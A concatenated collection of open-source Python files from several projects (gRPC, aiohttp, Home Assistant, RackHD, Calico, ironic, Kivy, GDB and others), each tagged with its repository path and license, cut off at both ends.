'cause_no_error_no_data_for_balancer_a_record':
False,
}
all_configs.append(config)
return all_configs
all_scenarios += generate_client_referred_to_backend_multiple_balancers()
print((yaml.dump({
'lb_interop_test_scenarios': all_scenarios,
})))
| ctiller/grpc | tools/run_tests/lb_interop_tests/gen_build_yaml.py | Python | apache-2.0 | 12,124 |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""oslo.i18n integration module.
See http://docs.openstack.org/developer/oslo.i18n/usage.html
"""
import oslo_i18n
_translators = oslo_i18n.TranslatorFactory(domain='murano')
# The primary translation function using the well-known name "_"
_ = _translators.primary
# Translators for log levels.
#
# The abbreviated names are meant to reflect the usual use of a short
# name like '_'. The "L" is for "log" and the other letter comes from
# the level.
_LI = _translators.log_info
_LW = _translators.log_warning
_LE = _translators.log_error
_LC = _translators.log_critical
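
# Typical call sites (for illustration): raise Exception(_('message')) for
# user-facing strings, or LOG.warning(_LW('message')) for translated logs.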
| olivierlemasle/murano | murano/common/i18n.py | Python | apache-2.0 | 1,149 |
import pytest
import aiohttp
from aiohttp import web
@pytest.mark.run_loop
async def test_client_ws_async_for(loop, create_server):
items = ['q1', 'q2', 'q3']
async def handler(request):
ws = web.WebSocketResponse()
await ws.prepare(request)
for i in items:
ws.send_str(i)
await ws.close()
return ws
app, url = await create_server(proto='ws')
app.router.add_route('GET', '/', handler)
resp = await aiohttp.ws_connect(url, loop=loop)
it = iter(items)
async for msg in resp:
assert msg.data == next(it)
with pytest.raises(StopIteration):
next(it)
assert resp.closed
@pytest.mark.run_loop
async def test_client_ws_async_with(loop, create_app_and_client):
async def handler(request):
ws = web.WebSocketResponse()
await ws.prepare(request)
msg = await ws.receive()
ws.send_str(msg.data + '/answer')
await ws.close()
return ws
app, client = await create_app_and_client(
server_params=dict(proto='ws'))
app.router.add_route('GET', '/', handler)
async with client.ws_connect('/') as ws:
ws.send_str('request')
msg = await ws.receive()
assert msg.data == 'request/answer'
assert ws.closed
@pytest.mark.run_loop
async def test_client_ws_async_with_shortcut(loop, create_server):
async def handler(request):
ws = web.WebSocketResponse()
await ws.prepare(request)
msg = await ws.receive()
ws.send_str(msg.data + '/answer')
await ws.close()
return ws
app, url = await create_server(proto='ws')
app.router.add_route('GET', '/', handler)
async with aiohttp.ws_connect(url, loop=loop) as ws:
ws.send_str('request')
msg = await ws.receive()
assert msg.data == 'request/answer'
assert ws.closed
| jashandeep-sohi/aiohttp | tests/test_py35/test_client_websocket_35.py | Python | apache-2.0 | 1,892 |
"""Test Agent DVR integration."""
from unittest.mock import AsyncMock, patch
from agent import AgentError
from homeassistant.components.agent_dvr.const import DOMAIN
from homeassistant.config_entries import ConfigEntryState
from homeassistant.core import HomeAssistant
from . import CONF_DATA, create_entry
from tests.components.agent_dvr import init_integration
from tests.test_util.aiohttp import AiohttpClientMocker
async def _create_mocked_agent(available: bool = True):
mocked_agent = AsyncMock()
mocked_agent.is_available = available
return mocked_agent
def _patch_init_agent(mocked_agent):
return patch(
"homeassistant.components.agent_dvr.Agent",
return_value=mocked_agent,
)
async def test_setup_config_and_unload(
hass: HomeAssistant, aioclient_mock: AiohttpClientMocker
):
"""Test setup and unload."""
entry = await init_integration(hass, aioclient_mock)
assert entry.state == ConfigEntryState.LOADED
assert len(hass.config_entries.async_entries(DOMAIN)) == 1
assert entry.data == CONF_DATA
assert await hass.config_entries.async_unload(entry.entry_id)
await hass.async_block_till_done()
assert entry.state is ConfigEntryState.NOT_LOADED
assert not hass.data.get(DOMAIN)
async def test_async_setup_entry_not_ready(hass: HomeAssistant):
"""Test that it throws ConfigEntryNotReady when exception occurs during setup."""
entry = create_entry(hass)
with patch(
"homeassistant.components.agent_dvr.Agent.update",
side_effect=AgentError,
):
await hass.config_entries.async_setup(entry.entry_id)
assert entry.state == ConfigEntryState.SETUP_RETRY
with _patch_init_agent(await _create_mocked_agent(available=False)):
await hass.config_entries.async_reload(entry.entry_id)
assert entry.state == ConfigEntryState.SETUP_RETRY
| jawilson/home-assistant | tests/components/agent_dvr/test_init.py | Python | apache-2.0 | 1,876 |
'''
Copyright 2017 Dell Inc. or its subsidiaries. All Rights Reserved.
Author(s):
George Paulos
This script tests the minimum-payload base case of the RackHD API 2.0 OS bootstrap workflows using the NFS mount or local repo method.
This routine runs OS bootstrap jobs simultaneously on multiple nodes.
For all 12 tests to run, 12 nodes are required in the stack. If there are fewer than that, the remaining tests will be skipped.
This test takes 15-20 minutes to run.
OS bootstrap tests require the following entries in config/install_default.json.
If an entry is missing, then that test will be skipped.
The order of entries determines test priority: the first entry runs on the first available node, and so on.
"os-install": [
{
"kvm": false,
"path": "/repo/esxi/5.5",
"version": "5.5",
"workflow": "Graph.InstallESXi"
},
{
"kvm": false,
"path": "/repo/esxi/6.0",
"version": "6.0",
"workflow": "Graph.InstallESXi"
},
{
"kvm": false,
"path": "/repo/centos/6.5",
"version": "6.5",
"workflow": "Graph.InstallCentOS"
},
{
"kvm": false,
"path": "/repo/centos/7.0",
"version": "7.0",
"workflow": "Graph.InstallCentOS"
},
{
"kvm": false,
"path": "/repo/rhel/7.0",
"version": "7.0",
"workflow": "Graph.InstallRHEL"
},
{
"kvm": false,
"path": "/repo/suse/42.1",
"version": "42.1",
"workflow": "Graph.InstallSUSE"
},
{
"kvm": false,
"path": "/repo/ubuntu",
"version": "trusty",
"workflow": "Graph.InstallUbuntu"
},
{
"kvm": false,
"path": "/repo/coreos",
"version": "899.17.0",
"workflow": "Graph.InstallCoreOS"
},
{
"kvm": true,
"path": "/repo/rhel/7.0",
"version": "7.0",
"workflow": "Graph.InstallRHEL"
},
{
"kvm": true,
"path": "/repo/centos/6.5",
"version": "6.5",
"workflow": "Graph.InstallCentOS"
},
{
"kvm": false,
"path": "/repo/winpe",
"productkey": "XXXXX-XXXXX-XXXXX-XXXXX-XXXXX",
"smbPassword": "onrack",
"smbRepo": "\\windowsServer2012",
"smbUser": "onrack",
"version": "2012",
"workflow": "Graph.InstallWindowsServer"
}
],
The OS repos are to be installed under the 'on-http/static/http' directory, reflecting the paths above.
These can be files, links, or nfs mounts to remote repos in the following dirs:
on-http/static/http/windowsServer2012 -- requires Samba share on RackHD server
on-http/static/http/repo/centos/6.5
on-http/static/http/repo/centos/7.0
on-http/static/http/repo/rhel/7.0
on-http/static/http/repo/suse/42.1
on-http/static/http/repo/esxi/5.5
on-http/static/http/repo/esxi/6.0
on-http/static/http/repo/winpe
on-http/static/http/repo/coreos/899.17.0
'''
import fit_path # NOQA: unused import
from nose.plugins.attrib import attr
import fit_common
import flogging
import sys
log = flogging.get_loggers()
# This gets the list of nodes
NODECATALOG = fit_common.node_select()
# dict containing bootstrap workflow IDs and states
NODE_STATUS = {}
# global timer
START_TIME = fit_common.time.time()
# collect repo information from config files
OSLIST = fit_common.fitcfg()["install-config"]["os-install"]
# download RackHD config from host
rackhdresult = fit_common.rackhdapi('/api/2.0/config')
if rackhdresult['status'] != 200:
log.error(" Unable to contact host, exiting. ")
sys.exit(255)
rackhdconfig = rackhdresult['json']
statichost = "http://" + str(rackhdconfig['fileServerAddress']) + ":" + str(rackhdconfig['fileServerPort'])
# this routine polls a workflow task ID for completion
def wait_for_workflow_complete(taskid):
result = None
while fit_common.time.time() - START_TIME < 1800 or result is None: # limit test to 30 minutes
result = fit_common.rackhdapi("/api/2.0/workflows/" + taskid)
if result['status'] != 200:
log.error(" HTTP error: " + result['text'])
return False
if result['json']['status'] == 'running' or result['json']['status'] == 'pending':
log.info_5("{} workflow status: {}".format(result['json']['injectableName'], result['json']['status']))
fit_common.time.sleep(30)
elif result['json']['status'] == 'succeeded':
log.info_5("{} workflow status: {}".format(result['json']['injectableName'], result['json']['status']))
return True
else:
log.error(" Workflow failed: " + result['text'])
return False
log.error(" Workflow Timeout: " + result['text'])
return False
# helper routine to return the task ID associated with the running bootstrap workflow
def node_taskid(workflow, version, kvm):
for entry in NODE_STATUS:
if NODE_STATUS[entry]['workflow'] == workflow \
and str(version) in NODE_STATUS[entry]['version'] \
and NODE_STATUS[entry]['kvm'] == kvm:
return NODE_STATUS[entry]['id']
return ""
# Match up tests to node IDs to feed skip decorators
index = 0 # node index
for item in OSLIST:
if index < len(NODECATALOG):
NODE_STATUS[NODECATALOG[index]] = \
{"workflow": item['workflow'], "version": item['version'], "kvm": item['kvm'], "id": "Pending"}
index += 1
# ------------------------ Tests -------------------------------------
@attr(all=False)
class api20_bootstrap_base(fit_common.unittest.TestCase):
@classmethod
def setUpClass(cls):
# run all OS install workflows first
nodeindex = 0
for item in OSLIST:
# if OS proxy entry exists in RackHD config, run bootstrap against selected node
if nodeindex < len(NODECATALOG):
# delete active workflows for specified node
fit_common.cancel_active_workflows(NODECATALOG[nodeindex])
# base payload common to all Linux
payload_data = {"options": {"defaults": {
"version": item['version'],
"kvm": item['kvm'],
"repo": statichost + item['path'],
"rootPassword": "1234567",
"hostname": "rackhdnode",
"users": [{"name": "rackhduser",
"password": "RackHDRocks!",
"uid": 1010}]}}}
# OS specific payload requirements
if item['workflow'] == "Graph.InstallUbuntu":
payload_data["options"]["defaults"]["baseUrl"] = "install/netboot/ubuntu-installer/amd64"
payload_data["options"]["defaults"]["kargs"] = {"live-installer/net-image": statichost +
item['path'] + "/ubuntu/install/filesystem.squashfs"}
if item['workflow'] == "Graph.InstallWindowsServer":
payload_data["options"]["defaults"]["productkey"] = item['productkey']
payload_data["options"]["defaults"]["smbUser"] = item['smbUser']
payload_data["options"]["defaults"]["smbPassword"] = item['smbPassword']
payload_data["options"]["defaults"]["smbRepo"] = "\\\\" + str(rackhdconfig['apiServerAddress']) + \
item['smbRepo']
payload_data["options"]["defaults"]["username"] = "rackhduser"
payload_data["options"]["defaults"]["password"] = "RackHDRocks!"
payload_data["options"]["defaults"].pop('rootPassword', None)
payload_data["options"]["defaults"].pop('users', None)
payload_data["options"]["defaults"].pop('kvm', None)
payload_data["options"]["defaults"].pop('version', None)
# run workflow
result = fit_common.rackhdapi('/api/2.0/nodes/' +
NODECATALOG[nodeindex] +
'/workflows?name=' + item['workflow'],
action='post', payload=payload_data)
if result['status'] == 201:
# this saves the task and node IDs
NODE_STATUS[NODECATALOG[nodeindex]] = \
{"workflow": item['workflow'],
"version": item['version'],
"kvm": item['kvm'],
"id": result['json']['instanceId']}
log.info_5(" TaskID: " + result['json']['instanceId'])
log.info_5(" Payload: " + fit_common.json.dumps(payload_data))
else:
# if no task ID is returned put 'failed' in ID field
NODE_STATUS[NODECATALOG[nodeindex]] = \
{"workflow": item['workflow'],
"version": item['version'],
"kvm": item['kvm'],
'id': "failed"}
log.error(" OS install " + item['workflow'] + " on node " + NODECATALOG[nodeindex] + " failed! ")
log.error(" Error text: " + result['text'])
log.error(" Payload: " + fit_common.json.dumps(payload_data))
# increment node index to run next bootstrap
nodeindex += 1
@fit_common.unittest.skipUnless(node_taskid("Graph.InstallESXi", "5.", False) != '',
"Skipping ESXi5.5, repo not configured or node unavailable")
def test_api20_bootstrap_esxi5(self):
self.assertTrue(wait_for_workflow_complete(node_taskid("Graph.InstallESXi", "5.", False)), "ESXi5.5 failed.")
@fit_common.unittest.skipUnless(node_taskid("Graph.InstallESXi", "6.", False) != '',
"Skipping ESXi6.0, repo not configured or node unavailable")
def test_api20_bootstrap_esxi6(self):
self.assertTrue(wait_for_workflow_complete(node_taskid("Graph.InstallESXi", "6.", False)), "ESXi6.0 failed.")
@fit_common.unittest.skipUnless(node_taskid("Graph.InstallCentOS", "6.", False) != '',
"Skipping Centos 6.5, repo not configured or node unavailable")
def test_api20_bootstrap_centos6(self):
self.assertTrue(wait_for_workflow_complete(node_taskid("Graph.InstallCentOS", "6.", False)), "Centos 6.5 failed.")
@fit_common.unittest.skipUnless(node_taskid("Graph.InstallCentOS", "6.", True) != '',
"Skipping Centos 6.5 KVM, repo not configured or node unavailable")
def test_api20_bootstrap_centos6_kvm(self):
self.assertTrue(wait_for_workflow_complete(node_taskid("Graph.InstallCentOS", "6.", True)), "Centos 6.5 KVM failed.")
@fit_common.unittest.skipUnless(node_taskid("Graph.InstallCentOS", "7.", False) != '',
"Skipping Centos 7.0, repo not configured or node unavailable")
def test_api20_bootstrap_centos7(self):
self.assertTrue(wait_for_workflow_complete(node_taskid("Graph.InstallCentOS", "7.", False)), "Centos 7.0 failed.")
@fit_common.unittest.skipUnless(node_taskid("Graph.InstallCentOS", "7.", True) != '',
"Skipping Centos 7.0 KVM, repo not configured or node unavailable")
def test_api20_bootstrap_centos7_kvm(self):
self.assertTrue(wait_for_workflow_complete(node_taskid("Graph.InstallCentOS", "7.", True)), "Centos 7.0 KVM failed.")
@fit_common.unittest.skipUnless(node_taskid("Graph.InstallRHEL", "7.", False) != '',
"Skipping Redhat 7.0, repo not configured or node unavailable")
def test_api20_bootstrap_rhel7(self):
self.assertTrue(wait_for_workflow_complete(node_taskid("Graph.InstallRHEL", "7.", False)), "RHEL 7.0 failed.")
@fit_common.unittest.skipUnless(node_taskid("Graph.InstallRHEL", "7.", True) != '',
"Skipping Redhat 7.0 KVM, repo not configured or node unavailable")
def test_api20_bootstrap_rhel7_kvm(self):
self.assertTrue(wait_for_workflow_complete(node_taskid("Graph.InstallRHEL", "7.", True)), "RHEL 7.0 KVM failed.")
@fit_common.unittest.skipUnless(node_taskid("Graph.InstallUbuntu", "trusty", False) != '',
"Skipping Ubuntu 14, repo not configured or node unavailable")
def test_api20_bootstrap_ubuntu14(self):
self.assertTrue(wait_for_workflow_complete(node_taskid("Graph.InstallUbuntu", "trusty", False)), "Ubuntu 14 failed.")
@fit_common.unittest.skipUnless(node_taskid("Graph.InstallCoreOS", "899.", False) != '',
"Skipping CoreOS 899.17.0, repo not configured or node unavailable")
def test_api20_bootstrap_coreos899(self):
self.assertTrue(wait_for_workflow_complete(node_taskid("Graph.InstallCoreOS", "899.", False)), "CoreOS 899.17 failed.")
@fit_common.unittest.skipUnless(node_taskid("Graph.InstallSUSE", "42.", False) != '',
"Skipping SuSe 42, repo not configured or node unavailable")
def test_api20_bootstrap_suse(self):
self.assertTrue(wait_for_workflow_complete(node_taskid("Graph.InstallSUSE", "42.", False)), "SuSe 42 failed.")
@fit_common.unittest.skipUnless(node_taskid("Graph.InstallWindowsServer", "2012", False) != '',
"Skipping Windows 2012, repo not configured or node unavailable")
def test_api20_bootstrap_windows(self):
self.assertTrue(wait_for_workflow_complete(node_taskid("Graph.InstallWindowsServer", "2012", False)), "Win2012 failed.")
if __name__ == '__main__':
fit_common.unittest.main()
| uppalk1/RackHD | test/tests/bootstrap/test_api20_os_bootstrap_parallel_local.py | Python | apache-2.0 | 14,582 |
# Copyright (c) Metaswitch Networks 2015. All rights reserved.
import logging
from calico.felix.actor import Actor, actor_message
from calico.felix.futils import IPV4, IPV6
from calico.felix.ipsets import Ipset, FELIX_PFX
_log = logging.getLogger(__name__)
ALL_POOLS_SET_NAME = FELIX_PFX + "all-ipam-pools"
MASQ_POOLS_SET_NAME = FELIX_PFX + "masq-ipam-pools"
MASQ_RULE_FRAGMENT = ("POSTROUTING "
"--match set --match-set %s src "
"--match set ! --match-set %s dst "
"--jump MASQUERADE" % (MASQ_POOLS_SET_NAME,
ALL_POOLS_SET_NAME))
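
# Assuming FELIX_PFX is "felix-", this renders roughly as:
#   POSTROUTING --match set --match-set felix-masq-ipam-pools src
#     --match set ! --match-set felix-all-ipam-pools dst --jump MASQUERADE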
class MasqueradeManager(Actor):
def __init__(self, ip_type, iptables_mgr):
super(MasqueradeManager, self).__init__(qualifier=str(ip_type))
assert ip_type in (IPV4, IPV6)
assert iptables_mgr.table == "nat"
self.ip_type = ip_type
self.pools_by_id = {}
self._iptables_mgr = iptables_mgr
ip_family = "inet" if ip_type == IPV4 else "inet6"
self._all_pools_ipset = Ipset(ALL_POOLS_SET_NAME,
ALL_POOLS_SET_NAME + "-tmp",
ip_family,
"hash:net")
self._masq_pools_ipset = Ipset(MASQ_POOLS_SET_NAME,
MASQ_POOLS_SET_NAME + "-tmp",
ip_family,
"hash:net")
self._dirty = False
@actor_message()
def apply_snapshot(self, pools_by_id):
_log.info("Applying IPAM pool snapshot with %s pools",
len(pools_by_id))
self.pools_by_id.clear()
self.pools_by_id.update(pools_by_id)
self._dirty = True
@actor_message()
def on_ipam_pool_updated(self, pool_id, pool):
if self.pools_by_id.get(pool_id) != pool:
if pool is None:
_log.info("IPAM pool deleted: %s", pool_id)
del self.pools_by_id[pool_id]
else:
_log.info("IPAM pool %s updated: %s", pool_id, pool)
self.pools_by_id[pool_id] = pool
self._dirty = True
def _finish_msg_batch(self, batch, results):
_log.debug("Finishing batch of IPAM pool changes")
if self._dirty:
_log.info("Marked as dirty, looking for masq-enabled pools")
masq_enabled_cidrs = set()
all_cidrs = set()
for pool in self.pools_by_id.itervalues():
all_cidrs.add(pool["cidr"])
if pool.get("masquerade", False):
masq_enabled_cidrs.add(pool["cidr"])
if masq_enabled_cidrs:
_log.info("There are masquerade-enabled pools present. "
"Updating.")
self._all_pools_ipset.replace_members(all_cidrs)
self._masq_pools_ipset.replace_members(masq_enabled_cidrs)
# Enable masquerading for traffic coming from pools that
# have it enabled only when the traffic is heading to an IP
# that isn't in any Calico-owned pool. (We assume that NAT
# is not required for Calico-owned IPs.)
self._iptables_mgr.ensure_rule_inserted(MASQ_RULE_FRAGMENT,
async=True)
else:
_log.info("No masquerade-enabled pools present. "
"Removing rules and ipsets.")
# Ensure that the rule doesn't exist before we try to remove
# our ipsets. Have to make a blocking call so that we don't
# try to remove the ipsets before we've cleaned up the rule
# that references them.
self._iptables_mgr.ensure_rule_removed(MASQ_RULE_FRAGMENT,
async=False)
# Safe to call even if the ipsets don't exist:
self._all_pools_ipset.delete()
self._masq_pools_ipset.delete()
self._dirty = False
_log.info("Finished refreshing ipsets")
| alexhersh/calico | calico/felix/masq.py | Python | apache-2.0 | 4,208 |
# Copyright 2016 Intel Corporation
# Copyright 2015 Hewlett Packard Development Company, LP
# Copyright 2015 Universidade Federal de Campina Grande
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from ironic.common.i18n import _
opts = [
cfg.StrOpt('manager_url',
help=_('URL where OneView is available.')),
cfg.StrOpt('username',
help=_('OneView username to be used.')),
cfg.StrOpt('password',
secret=True,
help=_('OneView password to be used.')),
cfg.BoolOpt('allow_insecure_connections',
default=False,
help=_('Option to allow insecure connection with OneView.')),
cfg.StrOpt('tls_cacert_file',
help=_('Path to CA certificate.')),
cfg.IntOpt('max_polling_attempts',
default=12,
help=_('Max connection retries to check changes on OneView.')),
    cfg.BoolOpt('enable_periodic_tasks',
                default=True,
                help=_('Whether to enable the periodic tasks that let the '
                       'OneView driver detect when OneView hardware '
                       'resources are taken and released by Ironic or '
                       'OneView users, and proactively manage nodes in '
                       'clean failed state, according to the Dynamic '
                       'Allocation model of hardware resource allocation '
                       'in OneView.')),
cfg.IntOpt('periodic_check_interval',
default=300,
help=_('Period (in seconds) for periodic tasks to be '
'executed when enable_periodic_tasks=True.')),
]
def register_opts(conf):
conf.register_opts(opts, group='oneview')
| SauloAislan/ironic | ironic/conf/oneview.py | Python | apache-2.0 | 2,255 |
"""
Python Interchangeable Virtual Instrument Library
Copyright (c) 2012-2014 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from .agilent90000 import *
class agilentDSA91204A(agilent90000):
"Agilent Infiniium DSA91204A IVI oscilloscope driver"
def __init__(self, *args, **kwargs):
self.__dict__.setdefault('_instrument_id', 'DSO91204A')
super(agilentDSA91204A, self).__init__(*args, **kwargs)
self._analog_channel_count = 4
self._digital_channel_count = 0
self._channel_count = 4
self._bandwidth = 12e9
self._init_channels()
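
# Minimal usage sketch (hypothetical VISA resource string):
#
#     import ivi
#     scope = ivi.agilent.agilentDSA91204A("TCPIP0::192.0.2.10::INSTR")
#     print(scope.identity.instrument_model)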
| elopezga/ErrorRate | ivi/agilent/agilentDSA91204A.py | Python | mit | 1,632 |
'''
FFmpeg video abstraction
========================
.. versionadded:: 1.0.8
This abstraction requires ffmpeg python extensions. We have made a special
extension that is used for the android platform but can also be used on x86
platforms. The project is available at::
http://github.com/tito/ffmpeg-android
The extension is designed for implementing a video player.
Refer to the documentation of the ffmpeg-android project for more information
about the requirements.
'''
try:
import ffmpeg
except:
raise
from kivy.core.video import VideoBase
from kivy.graphics.texture import Texture
class VideoFFMpeg(VideoBase):
def __init__(self, **kwargs):
self._do_load = False
self._player = None
super(VideoFFMpeg, self).__init__(**kwargs)
def unload(self):
if self._player:
self._player.stop()
self._player = None
self._state = ''
self._do_load = False
def load(self):
self.unload()
def play(self):
if self._player:
self.unload()
self._player = ffmpeg.FFVideo(self._filename)
self._player.set_volume(self._volume)
self._do_load = True
def stop(self):
self.unload()
def seek(self, percent, precise=True):
if self._player is None:
return
self._player.seek(percent)
def _do_eos(self):
self.unload()
self.dispatch('on_eos')
super(VideoFFMpeg, self)._do_eos()
def _update(self, dt):
if self._do_load:
self._player.open()
self._do_load = False
return
player = self._player
if player is None:
return
if not player.is_open:
self._do_eos()
return
frame = player.get_next_frame()
if frame is None:
return
        # the first time we get a frame, we know the video is now being read.
if self._texture is None:
self._texture = Texture.create(size=(
player.get_width(), player.get_height()),
colorfmt='rgb')
self._texture.flip_vertical()
self.dispatch('on_load')
if self._texture:
self._texture.blit_buffer(frame)
self.dispatch('on_frame')
def _get_duration(self):
if self._player is None:
return 0
return self._player.get_duration()
def _get_position(self):
if self._player is None:
return 0
return self._player.get_position()
def _set_volume(self, value):
self._volume = value
if self._player:
self._player.set_volume(self._volume)
| Cheaterman/kivy | kivy/core/video/video_ffmpeg.py | Python | mit | 2,694 |
def test():
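    # Perf pattern: grow a list with 1e4 appends, then join it into one
    # string; repeated 5e3 times to stress array append and string concat.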
for i in xrange(int(5e3)):
t = []
for j in xrange(int(1e4)):
#t[j] = 'x'
t.append('x')
t = ''.join(t)
test()
| svaarala/duktape | tests/perf/test-string-array-concat.py | Python | mit | 174 |
# Frame-filter commands.
# Copyright (C) 2013-2019 Free Software Foundation, Inc.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""GDB commands for working with frame-filters."""
import sys
import gdb
import copy
from gdb.FrameIterator import FrameIterator
from gdb.FrameDecorator import FrameDecorator
import gdb.frames
import itertools
# GDB Commands.
class SetFilterPrefixCmd(gdb.Command):
"""Prefix command for 'set' frame-filter related operations."""
def __init__(self):
super(SetFilterPrefixCmd, self).__init__("set frame-filter",
gdb.COMMAND_OBSCURE,
gdb.COMPLETE_NONE, True)
class ShowFilterPrefixCmd(gdb.Command):
"""Prefix command for 'show' frame-filter related operations."""
def __init__(self):
super(ShowFilterPrefixCmd, self).__init__("show frame-filter",
gdb.COMMAND_OBSCURE,
gdb.COMPLETE_NONE, True)
class InfoFrameFilter(gdb.Command):
"""List all registered Python frame-filters.
Usage: info frame-filters"""
def __init__(self):
super(InfoFrameFilter, self).__init__("info frame-filter",
gdb.COMMAND_DATA)
@staticmethod
def enabled_string(state):
"""Return "Yes" if filter is enabled, otherwise "No"."""
if state:
return "Yes"
else:
return "No"
def print_list(self, title, frame_filters, blank_line):
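        # Display filters in descending priority order (highest first).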
sorted_frame_filters = sorted(frame_filters.items(),
key=lambda i: gdb.frames.get_priority(i[1]),
reverse=True)
if len(sorted_frame_filters) == 0:
return 0
print(title)
print(" Priority Enabled Name")
for frame_filter in sorted_frame_filters:
name = frame_filter[0]
try:
priority = '{:<8}'.format(
str(gdb.frames.get_priority(frame_filter[1])))
enabled = '{:<7}'.format(
self.enabled_string(gdb.frames.get_enabled(frame_filter[1])))
print(" %s %s %s" % (priority, enabled, name))
except Exception:
e = sys.exc_info()[1]
print(" Error printing filter '"+name+"': "+str(e))
if blank_line:
print("")
return 1
def invoke(self, arg, from_tty):
any_printed = self.print_list("global frame-filters:", gdb.frame_filters, True)
cp = gdb.current_progspace()
any_printed += self.print_list("progspace %s frame-filters:" % cp.filename,
cp.frame_filters, True)
for objfile in gdb.objfiles():
any_printed += self.print_list("objfile %s frame-filters:" % objfile.filename,
objfile.frame_filters, False)
if any_printed == 0:
            print("No frame filters.")
# Internal enable/disable functions.
def _enable_parse_arg(cmd_name, arg):
""" Internal worker function to take an argument from
enable/disable and return a tuple of arguments.
Arguments:
cmd_name: Name of the command invoking this function.
args: The argument as a string.
Returns:
A tuple containing the dictionary, and the argument, or just
the dictionary in the case of "all".
"""
    argv = gdb.string_to_argv(arg)
argc = len(argv)
if argc == 0:
raise gdb.GdbError(cmd_name + " requires an argument")
if argv[0] == "all":
if argc > 1:
raise gdb.GdbError(cmd_name + ": with 'all' " \
"you may not specify a filter.")
elif argc != 2:
raise gdb.GdbError(cmd_name + " takes exactly two arguments.")
return argv
def _do_enable_frame_filter(command_tuple, flag):
"""Worker for enabling/disabling frame_filters.
Arguments:
command_type: A tuple with the first element being the
frame filter dictionary, and the second being
the frame filter name.
flag: True for Enable, False for Disable.
"""
list_op = command_tuple[0]
op_list = gdb.frames.return_list(list_op)
if list_op == "all":
for item in op_list:
gdb.frames.set_enabled(item, flag)
else:
frame_filter = command_tuple[1]
try:
ff = op_list[frame_filter]
except KeyError:
msg = "frame-filter '" + str(frame_filter) + "' not found."
raise gdb.GdbError(msg)
gdb.frames.set_enabled(ff, flag)
def _complete_frame_filter_list(text, word, all_flag):
"""Worker for frame filter dictionary name completion.
Arguments:
text: The full text of the command line.
word: The most recent word of the command line.
all_flag: Whether to include the word "all" in completion.
Returns:
A list of suggested frame filter dictionary name completions
from text/word analysis. This list can be empty when there
are no suggestions for completion.
"""
if all_flag == True:
filter_locations = ["all", "global", "progspace"]
else:
filter_locations = ["global", "progspace"]
for objfile in gdb.objfiles():
filter_locations.append(objfile.filename)
# If the user just asked for completions with no completion
# hints, just return all the frame filter dictionaries we know
# about.
if (text == ""):
return filter_locations
# Otherwise filter on what we know.
    flist = [x for x in filter_locations if x.startswith(text)]
# If we only have one completion, complete it and return it.
if len(flist) == 1:
flist[0] = flist[0][len(text)-len(word):]
# Otherwise, return an empty list, or a list of frame filter
# dictionaries that the previous filter operation returned.
return flist
def _complete_frame_filter_name(word, printer_dict):
"""Worker for frame filter name completion.
Arguments:
word: The most recent word of the command line.
printer_dict: The frame filter dictionary to search for frame
filter name completions.
Returns: A list of suggested frame filter name completions
from word analysis of the frame filter dictionary. This list
can be empty when there are no suggestions for completion.
"""
printer_keys = printer_dict.keys()
if (word == ""):
return printer_keys
    flist = [x for x in printer_keys if x.startswith(word)]
return flist
class EnableFrameFilter(gdb.Command):
"""GDB command to enable the specified frame-filter.
Usage: enable frame-filter DICTIONARY [NAME]
DICTIONARY is the name of the frame filter dictionary on which to
operate. If dictionary is set to "all", perform operations on all
dictionaries. Named dictionaries are: "global" for the global
frame filter dictionary, "progspace" for the program space's frame
filter dictionary. If either all, or the two named dictionaries
are not specified, the dictionary name is assumed to be the name
of an "objfile" -- a shared library or an executable.
NAME matches the name of the frame-filter to operate on."""
def __init__(self):
super(EnableFrameFilter, self).__init__("enable frame-filter",
gdb.COMMAND_DATA)
def complete(self, text, word):
"""Completion function for both frame filter dictionary, and
frame filter name."""
if text.count(" ") == 0:
return _complete_frame_filter_list(text, word, True)
else:
printer_list = gdb.frames.return_list(text.split()[0].rstrip())
return _complete_frame_filter_name(word, printer_list)
def invoke(self, arg, from_tty):
command_tuple = _enable_parse_arg("enable frame-filter", arg)
_do_enable_frame_filter(command_tuple, True)
class DisableFrameFilter(gdb.Command):
"""GDB command to disable the specified frame-filter.
Usage: disable frame-filter DICTIONARY [NAME]
DICTIONARY is the name of the frame filter dictionary on which to
operate. If dictionary is set to "all", perform operations on all
dictionaries. Named dictionaries are: "global" for the global
frame filter dictionary, "progspace" for the program space's frame
filter dictionary. If either all, or the two named dictionaries
are not specified, the dictionary name is assumed to be the name
of an "objfile" -- a shared library or an executable.
